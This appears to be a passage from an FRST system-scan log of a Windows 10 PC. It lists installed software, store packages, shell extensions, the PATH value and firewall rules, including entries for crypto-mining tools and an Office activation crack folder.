Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017 (HKLM-x32\...\{f325f05b-f963-4640-a43b-c8a494cdda0f}) (Version: 14.10.25017.0 - Microsoft Corporation)
Native Instruments FM8 (HKLM-x32\...\Native Instruments FM8) (Version: 1.4.0.1498 - Native Instruments)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 22.0.2 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden
OneKeyRecovery (HKLM-x32\...\{B1C01152-7A95-4F37-AEDC-5B09DE983271}) (Version: 9.0.1.1607 - Lenovo)
OpenIV (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\OpenIV) (Version: 3.0.1006 - .black/OpenIV Team)
osrss (HKLM-x32\...\{1BA1133B-1C7A-41A0-8CBF-9B993E63D296}) (Version: 1.0.0 - Microsoft Corporation) Hidden
PDFMate eBook Converter Professional 1.0.1 (HKLM-x32\...\PDFMate eBook Converter Professional) (Version: 1.0.1 - PDFMate eBook Converter Professional)
Project64 version 2.3.2.202 (HKLM-x32\...\{BEB5FB69-4080-466F-96C4-F15DF271718B}_is1) (Version: 2.3.2.202 - )
Python 2.7.16 (64-bit) (HKLM\...\{DCD5B320-89D9-4C7C-9E8B-84496588744e}) (Version: 2.7.16150 - Python Software Foundation)
Python 3.4 pygame-1.9.2a0 (HKLM\...\{40682844-6E85-4D43-89F8-FD68B09E2A52}) (Version: 1.9.2 - Pete Shinners, Rene Dudfield, Marcus von Appen, Bob Pendleton, others...)
Python 3.7.2 (32-bit) (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\{0f40e78b-67e1-4e0c-a2fd-e9325d9dfc82}) (Version: 3.7.2150.0 - Python Software Foundation)
Python 3.7.2 (64-bit) (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\{c0f1e976-f585-48f8-968d-48c870496d4e}) (Version: 3.7.2150.0 - Python Software Foundation)
Python 3.7.2 Add to Path (32-bit) (HKLM-x32\...\{A0253733-D4C4-4964-AB97-C5C80FCD580F}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Add to Path (64-bit) (HKLM\...\{55DD38E4-4D05-4A05-A1CD-415A07DAF40B}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Core Interpreter (32-bit) (HKLM-x32\...\{3A09B849-4D48-41AA-9461-112E6CEC405D}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Core Interpreter (64-bit symbols) (HKLM\...\{DD895F52-DDAD-4CC6-938C-0D29E379A87E}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Core Interpreter (64-bit) (HKLM\...\{8BDA6D6E-234F-4DD8-A7CA-6DB55F6B609E}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Development Libraries (32-bit) (HKLM-x32\...\{A14E7090-5888-460B-9003-1C3DA5AD3D35}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Development Libraries (64-bit) (HKLM\...\{D2CC67CD-ED4E-40BC-94FD-3EA65A6824D6}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Documentation (32-bit) (HKLM-x32\...\{D2FA452F-4742-4805-BEB1-AC81ED48F4A8}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Documentation (64-bit) (HKLM\...\{1A91F9E1-13CE-4D8B-9257-61376EC9ED92}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Executables (32-bit) (HKLM-x32\...\{D6FF50CC-E41E-4FFB-B7B9-72D71BF00C55}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Executables (64-bit symbols) (HKLM\...\{70152518-F739-42DD-B6C4-E43D65B127F0}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Executables (64-bit) (HKLM\...\{24260BC9-6F83-4F8F-96AE-6D654621DDF7}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 pip Bootstrap (32-bit) (HKLM-x32\...\{0D2B3674-3B1E-4281-B5FD-37D700602129}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 pip Bootstrap (64-bit) (HKLM\...\{E33F2815-DA54-4554-87A2-FD25EAB1A963}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Standard Library (32-bit) (HKLM-x32\...\{667226B8-23CA-47C1-A070-D3B85E8C9292}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Standard Library (64-bit symbols) (HKLM\...\{42BBA31E-AB76-480F-9B67-79564C3A2C3B}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Standard Library (64-bit) (HKLM\...\{BE46C9B8-DD8E-4835-B686-644EA6415FEE}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Tcl/Tk Support (32-bit) (HKLM-x32\...\{34AD493A-01AA-4D6A-9229-BF0406F22D14}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Tcl/Tk Support (64-bit symbols) (HKLM\...\{B23B590C-3BBC-4945-BED8-FEB4D5F953B2}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Tcl/Tk Support (64-bit) (HKLM\...\{1ED81958-CE51-4748-ABFA-583227794FDB}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Test Suite (32-bit) (HKLM-x32\...\{F0B6A6E9-C7E1-4730-A29D-71C02B800028}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Test Suite (64-bit symbols) (HKLM\...\{1EE636DD-EEFD-4F97-87C5-247050EFA6B7}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Test Suite (64-bit) (HKLM\...\{C1CA4559-3153-4EF9-8B74-CC804965E441}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Utility Scripts (32-bit) (HKLM-x32\...\{06CE3F8B-A658-462C-AD3D-FA7142297E97}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python 3.7.2 Utility Scripts (64-bit) (HKLM\...\{259C5D04-A6E0-47F3-AB23-91F2E9828466}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{FA2A3867-8965-4CF7-83E2-C8960652F5AD}) (Version: 3.7.6565.0 - Python Software Foundation)
reFX Nexus VSTi RTAS v2.2.0 (HKLM-x32\...\reFX Nexus_is1) (Version: - )
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
Sky Go 1.4.16.0 (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\com.bskyb.skygoplayer_is1) (Version: 1.4.16.0 - Sky)
SonicProjects OP-X PRO-II (HKLM\...\OP-X PRO-II_is1) (Version: 1.2.5 - Team V.R)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SuperWave Equinoxe Extreme HD Edition (Poly 20) (HKLM-x32\...\{CE6B55F8-6BBE-4999-A050-E01EE5A595F7}) (Version: 1.0 - SuperWave)
TunnelBear (HKLM-x32\...\{0d6e112b-ecd9-4b6a-92ed-6e708fb7de2f}) (Version: 3.6.3.0 - TunnelBear)
TunnelBear (HKLM-x32\...\{95EAEB10-FF80-47E1-BAF7-4B46C4D6A46C}) (Version: 3.6.3.0 - TunnelBear) Hidden
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{C3ACFCEA-240F-4DCC-A0C3-DD55FEE6C3C2}) (Version: 2.58.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{52C1DD03-104E-4AC6-9DC6-21D585721ED1}) (Version: 1.19.0.0 - Microsoft Corporation) Hidden
VB3-II version 1.0.3 (HKLM\...\VB3-II_is1) (Version: 1.0.3 - Genuine Soundware & Instruments & Team V.R)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Waves Central 10.0.0.3 (HKLM-x32\...\{94000200-C561-4E32-99EB-3C5AD3683A70}_is1) (Version: 10.0.0 - Waves, Inc.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22532 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
Packages:
=========
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.0.2.0_x64__tf1gferkr813w [2019-05-27] (Autodesk Inc.)
EdgeDevtoolsPlugin -> C:\WINDOWS\SystemApps\Microsoft.EdgeDevtoolsPlugin_cw5n1h2txyewy [2018-09-20] (Microsoft Corporation)
iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa [2019-05-29] (Apple Inc.)
Lenovo Account Portal -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2018-09-16] (LENOVO INCORPORATED.)
Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_4.27.32.0_x86__k1h2ywk1493x8 [2019-03-26] (LENOVO INC.)
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20174.0_x64__8wekyb3d8bbwe [2019-05-30] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Minesweeper -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMinesweeper_2.7.4300.0_x86__8wekyb3d8bbwe [2018-10-09] (Microsoft Studios) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.30.10924.0_x64__8wekyb3d8bbwe [2019-04-05] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.3.4032.0_x86__8wekyb3d8bbwe [2019-04-10] (Microsoft Studios) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.28.10351.0_x64__8wekyb3d8bbwe [2019-02-12] (Microsoft Corporation) [MS Ad]
NOW TV -> C:\Program Files\WindowsApps\NOWTV.NOWTV_1.19.0.2_x64__k6nsketb5gh92 [2018-09-30] (Sky UK Limited)
Plex -> C:\Program Files\WindowsApps\CAF9E577.Plex_3.2.20.0_x64__aam28m9va5cke [2018-09-16] (Plex)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.1.135.0_x64__dt26b99r8h8gj [2019-04-08] (Realtek Semiconductor Corp)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2018-09-11 23:15 - 2018-09-11 23:15 - 000167424 _____ () [File not signed] C:\Program Files (x86)\TunnelBear\TunnelBear.VigilantBear.Wrapper.dll
2019-05-11 07:44 - 2018-12-18 03:20 - 001006080 _____ () [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\LenovoWiFiSecurityPlugin\x86\x86\e_sqlite3.dll
2018-09-14 11:22 - 2018-04-30 13:00 - 000075776 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-03-16 10:13 - 2018-08-12 21:29 - 001255424 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\x86\SQLite.Interop.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\localhost -> localhost
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2017-03-18 22:03 - 2019-06-09 19:47 - 000000830 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files\Python37\Scripts\;C:\Program Files\Python37\;%INTEL_DEV_REDIST%redist\ia32\compiler;%INTEL_DEV_REDIST%redist\intel64\compiler;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files (x86)\Calibre2\;C:\Program Files\Csound6_x64\bin;C:\Program Files\Cabbage
HKU\S-1-5-21-1007420050-912919110-3395148121-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\MYMLA\Downloads\Mymla image 2.png
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{5BCC5A17-DCF8-468C-9D70-9F666919D7B3}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [TCP Query User{9FCA9CBB-5FAA-4EC1-B494-DC10F4CAEDEC}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [{D8A93456-1AC4-4AC2-87FA-E4C1C31E7318}] => (Allow) C:\Users\MYMLA\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{D1DA5DBA-D82D-4C1B-98BC-CBE51CA60412}] => (Allow) C:\Users\MYMLA\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{F39E879E-3FCD-4756-8098-2474802545C4}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{DFF6C8B5-0677-447A-9873-B8DF601CADBD}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe No File
FirewallRules: [{17873308-4430-4E91-877D-546EC7870DF2}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe No File
FirewallRules: [{888C4B9A-1006-4CBD-99AE-EDE5B8788C5C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{A3150413-7F2C-4302-B45D-E89D1A83F2F8}] => (Allow) C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe (LENOVO -> Lenovo)
FirewallRules: [{BD6563C2-95DD-45F1-B99F-F5D0FF0488CC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{79B91D1E-CBC8-4452-9631-0C4853EDA57A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{953AC05B-38C7-452F-9B50-DC1B3E45F88A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{E896D712-BA1B-4DD6-910F-70CA34074D85}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [TCP Query User{71C82E1C-714A-45E8-8F14-455FC5C6B671}C:\program files\droidjoy server\droidjoyserver.exe] => (Allow) C:\program files\droidjoy server\droidjoyserver.exe No File
FirewallRules: [UDP Query User{9DA8EB19-4587-401C-B9CA-18EDF4AE2D4D}C:\program files\droidjoy server\droidjoyserver.exe] => (Allow) C:\program files\droidjoy server\droidjoyserver.exe No File
FirewallRules: [OpenSSH-Server-In-TCP] => (Allow) %SystemRoot%\system32\OpenSSH\sshd.exe (Microsoft Windows -> )
FirewallRules: [TCP Query User{E116D0EF-682B-424C-8092-726E775BF9ED}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe () [File not signed]
FirewallRules: [UDP Query User{D3F9D790-DC44-492B-93DD-8AE802A64455}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe () [File not signed]
FirewallRules: [TCP Query User{558DCCF2-143E-441E-89C7-C836676DDB3D}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe () [File not signed]
FirewallRules: [UDP Query User{00FABDE6-6CAE-4E75-AC3C-5685E3A22339}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe () [File not signed]
FirewallRules: [TCP Query User{2B21D801-147D-428E-AB77-98E5ACCC10D5}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe () [File not signed]
FirewallRules: [UDP Query User{683EA547-4A20-4EA4-8F7A-43ADB96DBAB8}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe () [File not signed]
FirewallRules: [TCP Query User{6C41342F-BEB4-48A7-BF5D-0AB0F10B8E3B}C:\program files\bitcoingold\bitcoin-qt.exe] => (Allow) C:\program files\bitcoingold\bitcoin-qt.exe () [File not signed]
FirewallRules: [UDP Query User{91C911B8-8377-41EE-9A05-F786BCC8137A}C:\program files\bitcoingold\bitcoin-qt.exe] => (Allow) C:\program files\bitcoingold\bitcoin-qt.exe () [File not signed]
FirewallRules: [TCP Query User{E487A2AD-3508-4020-BA88-BB687BCBD4DD}C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe] => (Allow) C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe () [File not signed]
FirewallRules: [UDP Query User{54411C7F-66A1-46AA-A44D-80A98A724FDA}C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe] => (Allow) C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe () [File not signed]
FirewallRules: [TCP Query User{FFF83688-9F32-4EF8-A6C0-3636AAD92FC2}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{2BF6D6C5-45EB-4EF7-B2A1-43E85FBAE833}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{400E2193-7797-4894-8CE2-0EE1AE4BF7F1}C:\games\grand theft auto v\gta5.exe] => (Allow) C:\games\grand theft auto v\gta5.exe (Take-Two Interactive Software, Inc. -> Rockstar Games)
FirewallRules: [UDP Query User{0CD7978B-EFEC-4E04-91B8-CA07C5D39949}C:\games\grand theft auto v\gta5.exe] => (Allow) C:\games\grand theft auto v\gta5.exe (Take-Two Interactive Software, Inc. -> Rockstar Games)
FirewallRules: [{2C756361-5B1E-4989-B011-583E8804F5CC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{673758B0-B184-4A19-81DE-2D7F2D4F0714}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{8554282C-AA37-4A97-98F2-5EBDC6B082AA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1F38B67E-B4CD-4A58-84DB-7C2C83AADBAD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{7ECD9013-AD14-4E2A-8FB3-E3033F273A8D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DB3060F7-BAEB-4394-A840-C27E2144A6BC}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\vlmcsd.exe () [File not signed]
FirewallRules: [{0A4B426A-5FE9-4F29-B87A-8BAB6017BF1A}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\vlmcsd.exe () [File not signed]
FirewallRules: [{E86C5A22-D062-4C6E-B79F-0FE9F2C946E9}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\FakeClient.exe () [File not signed]
FirewallRules: [{00ED7511-76C3-4836-86F6-D4724D7ABBB7}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\FakeClient.exe () [File not signed]
FirewallRules: [TCP Query User{61C20444-C7D7-46EF-ACDC-03923A55A73E}C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe] => (Allow) C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe (Sky UK Limited -> Sky UK)
FirewallRules: [UDP Query User{4DC2A151-320E-431A-85F5-D4159D489C76}C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe] => (Allow) C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe (Sky UK Limited -> Sky UK)
FirewallRules: [{EA95FADF-0D3D-45BD-B991-27F5D9E20703}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8E634A53-1167-46FB-A60F-53C43072EB51}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{8CBB52BC-2926-4301-8DC9-C94129BEF3EE}C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe] => (Allow) C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe (JetBrains s.r.o. -> JetBrains s.r.o.)
FirewallRules: [UDP Query User{03BEDA6A-7B79-4A20-B760-1A40C804AD50}C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe] => (Allow) C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe (JetBrains s.r.o. -> JetBrains s.r.o.)
